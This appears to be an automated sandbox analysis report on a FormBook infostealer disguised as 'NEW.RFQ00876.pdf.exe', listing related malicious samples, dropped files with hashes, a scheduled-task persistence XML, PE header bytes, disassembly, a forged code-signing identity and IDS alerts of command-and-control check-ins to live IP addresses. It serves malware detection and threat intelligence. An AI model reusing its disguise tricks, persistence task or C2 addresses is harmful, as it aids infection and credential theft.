INTERNET-CZKtis238403KtisCZ | PO 4800040256.exe | malicious | FormBook
• 81.2.196.19
INTERNET-CZKtis238403KtisCZ | yGktPvplJn.exe | malicious | Pushdo
• 81.2.194.241
PLANETHOSTER-8CA | Quotation Validity.exe | malicious | FormBook, PureLog Stealer
• 146.88.233.115
PLANETHOSTER-8CA | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer
• 146.88.233.115
PLANETHOSTER-8CA | Quotation sheet.exe | malicious | FormBook, PureLog Stealer
• 146.88.233.115
PLANETHOSTER-8CA | Purchase Order PO.exe | malicious | FormBook
• 146.88.233.115
PLANETHOSTER-8CA | PO #2411071822.exe | malicious | FormBook
• 146.88.233.115
PLANETHOSTER-8CA | Quotation.exe | malicious | FormBook
• 146.88.233.115
PLANETHOSTER-8CA | payments.exe | malicious | FormBook
• 146.88.233.115
PLANETHOSTER-8CA | https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg== | malicious | Unknown
• 146.88.234.239
EVCPUS | BND147124_MBL Check_revised.exe | malicious | FormBook, PureLog Stealer
• 199.16.129.175
EVCPUS | Yb6ztdvQaB.elf | malicious | Unknown
• 85.236.153.44
No context
No context
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                  Process:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.380805901110357
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:lGLHyIFKL3IZ2KRH9OugYs
                                                                                  MD5:A9155A6B0927A3C0F28D51A6B7113A96
                                                                                  SHA1:02E3CEAD53BE46D65C1BED154A51707D856DFEA2
                                                                                  SHA-256:168BD0354D375B14667BB2E7BD23754D06F31D46707329A334FAB6394BCF74BD
                                                                                  SHA-512:AA1D2C2D7825C02187712FB2AA6F0408E88D8A5F3C95ED1406BFCED825CFA965D53531893E7E655A04A058877A779A35AD6F73FB0A9A40A105B950083330D80E
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                  Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:modified
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1215420383712111
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1608
                                                                                  Entropy (8bit):5.122887345938021
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtoHxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuToRv
                                                                                  MD5:57C0076D1244E05359994F5D658C9AB2
                                                                                  SHA1:436D4BF54E6D4CC7DAB566077036E00245F310D1
                                                                                  SHA-256:F82150B3A92B4E4FF349CA97E47246386345C434F5DFCD80284BE5F35CA0F999
                                                                                  SHA-512:E5BDC52229CB124BDA1183EAB915B278F3481E93D5540B1585D3F16627DA4A6F244C60FFBF33E07350E3C0F772CFBF1F958BE85F48FED81924D7B65FF1ED1C9E
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1608
                                                                                  Entropy (8bit):5.122887345938021
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtoHxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuToRv
                                                                                  MD5:57C0076D1244E05359994F5D658C9AB2
                                                                                  SHA1:436D4BF54E6D4CC7DAB566077036E00245F310D1
                                                                                  SHA-256:F82150B3A92B4E4FF349CA97E47246386345C434F5DFCD80284BE5F35CA0F999
                                                                                  SHA-512:E5BDC52229CB124BDA1183EAB915B278F3481E93D5540B1585D3F16627DA4A6F244C60FFBF33E07350E3C0F772CFBF1F958BE85F48FED81924D7B65FF1ED1C9E
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):817160
                                                                                  Entropy (8bit):7.71034558477349
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:hcdY9shQgAlUVHqVMvdv6R6epIkvW3wmf2AYzdPfuOY4gx8G6m3Ef0h4vFvC6kR:KdhlqVOGIk9mfrYzduOYl+G6/g4vNCZ
                                                                                  MD5:198FADC2115110C8B0B774C88C70215E
                                                                                  SHA1:619B8AF2BF8C70EA469A7866CC4ED78A38BC59C1
                                                                                  SHA-256:78AB8447457BCF006649029303778DC4D8CFB3A3E6E38DE1B17D9BE17401BC2B
                                                                                  SHA-512:A80C4EBCAF746345CF931C491130487A7B9C746A48347E422D8CB6EB71433B50F0F04BFEB7374834523B1F0EFBBF5D897F3F5FC425CC273764CC4FC8071C816B
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....YVg..............0......(.......7... ...@....@.. ....................................@.................................87..O....@...$...........B...6........................................................... ............... ..H............text........ ...................... ..`.rsrc....$...@...&..................@..@.reloc...............@..............@..B................l7......H.......$L..L{..........p....o...........................................0...........(.....(.....{...........%.r...p( ...s!....%.r...p( ...s!....%.r%..p( ...s!........T...%.b...("...s!...(#...rA..p ............%...%...o$...&*....0..^........{....o%....{.....A.Zo&....[...o'...&.{....o%...o(....>"....{....o%...o)....{....o%...r_..po'...&.{....o*...ru..pr_..p.(+....@.....{....o.....{....r...p.{....|....(,...(-...o.....{....r...p.{....|....(,...(-...o.....{....r...p.{....|....(,.
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.71034558477349
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:NEW.RFQ00876.pdf.exe
                                                                                  File size:817'160 bytes
                                                                                  MD5:198fadc2115110c8b0b774c88c70215e
                                                                                  SHA1:619b8af2bf8c70ea469a7866cc4ed78a38bc59c1
                                                                                  SHA256:78ab8447457bcf006649029303778dc4d8cfb3a3e6e38de1b17d9be17401bc2b
                                                                                  SHA512:a80c4ebcaf746345cf931c491130487a7b9c746a48347e422d8cb6eb71433b50f0f04bfeb7374834523b1f0efbbf5d897f3f5fc425cc273764cc4fc8071c816b
                                                                                  SSDEEP:12288:hcdY9shQgAlUVHqVMvdv6R6epIkvW3wmf2AYzdPfuOY4gx8G6m3Ef0h4vFvC6kR:KdhlqVOGIk9mfrYzduOYl+G6/g4vNCZ
                                                                                  TLSH:27050158A76DD513DA840B349EB5F6B8256C5E8DF811D203AED9BFAF3C72B142C14283
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....YVg..............0......(.......7... ...@....@.. ....................................@................................
                                                                                  Icon Hash:17692632b3936907
                                                                                  Entrypoint:0x4c378a
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x675659D2 [Mon Dec 9 02:45:38 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                  Error Number:-2146869232
                                                                                  Not Before:12/11/2018 19:00:00
                                                                                  Not After:08/11/2021 18:59:59
                                                                                  Subject Chain
                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                  Version:3
                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  push ebx
                                                                                  add byte ptr [ecx+00h], bh
                                                                                  jnc 00007F045CC5F382h
                                                                                  je 00007F045CC5F382h
                                                                                  add byte ptr [ebp+00h], ch
                                                                                  add byte ptr [ecx+00h], al
                                                                                  arpl word ptr [eax], ax
                                                                                  je 00007F045CC5F382h
                                                                                  imul eax, dword ptr [eax], 00610076h
                                                                                  je 00007F045CC5F382h
                                                                                  outsd
                                                                                  add byte ptr [edx+00h], dh
                                                                                  push ebx
                                                                                  add byte ptr [ecx+00h], bh
                                                                                  jnc 00007F045CC5F382h
                                                                                  je 00007F045CC5F382h
                                                                                  add byte ptr [ebp+00h], ch
                                                                                  add byte ptr [edx+00h], dl
                                                                                  add byte ptr [esi+00h], ah
                                                                                  insb
                                                                                  add byte ptr [ebp+00h], ah
                                                                                  arpl word ptr [eax], ax
                                                                                  je 00007F045CC5F382h
                                                                                  imul eax, dword ptr [eax], 006E006Fh
                                                                                  add byte ptr [ecx+00h], al
                                                                                  jnc 00007F045CC5F382h
                                                                                  jnc 00007F045CC5F382h
                                                                                  add byte ptr [ebp+00h], ch
                                                                                  bound eax, dword ptr [eax]
                                                                                  insb
                                                                                  add byte ptr [ecx+00h], bh
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  dec esp
                                                                                  add byte ptr [edi+00h], ch
                                                                                  popad
                                                                                  add byte ptr [eax+eax+00h], ah
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc3738 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x24ec | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc4200 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc17f0 | 0xc1800 | 41b2c8f9bd53a53f4ba5874d1695784b | False | 0.9061313993863049 | data | 7.711273899286818 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0x24ec | 0x2600 | c0a86a11fae33068f1ee67074757015c | False | 0.874280427631579 | data | 7.4341657896207165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc8000 | 0xc | 0x200 | 347b5b35754d8142bd2b6980e4162ed8 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc4100 | 0x1e7e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9827056110684089
RT_GROUP_ICON | 0xc5f90 | 0x14 | data | | | 1.05
RT_VERSION | 0xc5fb4 | 0x338 | data | | | 0.4368932038834951
RT_MANIFEST | 0xc62fc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-09T06:56:16.750040+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50023 | 172.67.145.234 | 80 | TCP
2024-12-09T06:56:58.918321+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49766 | 85.159.66.93 | 80 | TCP
2024-12-09T06:57:15.822187+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49805 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:15.822187+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.7 | 49805 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:18.480511+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49811 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:21.145822+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49820 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:23.798878+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49829 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:31.029390+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49845 | 85.25.177.138 | 80 | TCP
2024-12-09T06:57:33.693663+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49851 | 85.25.177.138 | 80 | TCP
2024-12-09T06:57:36.368290+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49861 | 85.25.177.138 | 80 | TCP
2024-12-09T06:57:39.033503+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49868 | 85.25.177.138 | 80 | TCP
2024-12-09T06:58:03.079877+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49923 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:05.808685+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49929 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:08.417208+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49936 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:11.096549+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49945 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:18.242015+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49962 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:20.897896+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49968 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:23.583776+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49974 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:26.256367+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49984 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:33.671905+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49994 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:36.369431+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49995 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:39.013602+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49996 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:41.691427+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49997 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:48.580782+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49998 | 77.68.64.45 | 80 | TCP
2024-12-09T06:58:51.391842+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49999 | 77.68.64.45 | 80 | TCP
2024-12-09T06:58:54.138261+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50000 | 77.68.64.45 | 80 | TCP
